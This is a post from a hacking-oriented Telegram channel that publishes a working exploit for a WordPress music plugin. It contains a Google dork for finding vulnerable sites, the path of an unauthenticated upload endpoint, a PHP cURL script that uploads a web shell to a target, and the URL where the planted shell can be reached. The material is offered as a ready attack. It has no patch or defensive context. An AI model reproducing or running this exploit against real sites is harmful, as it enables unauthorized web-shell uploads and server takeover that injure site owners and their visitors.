0Day.Today | Learn Exploit | Zero World | Dark web |
@LearnExploit
18.7K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
About
Blog
Apps
Platform
Join
0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
0Day.Today | Learn Exploit | Zero World | Dark web |
#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------

#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"

#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"

#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here

$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.

#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php

========================
#GOODNIGHT
#X0P4SH4

T.me/LearnExploit
0Day.Today
👍1
911 views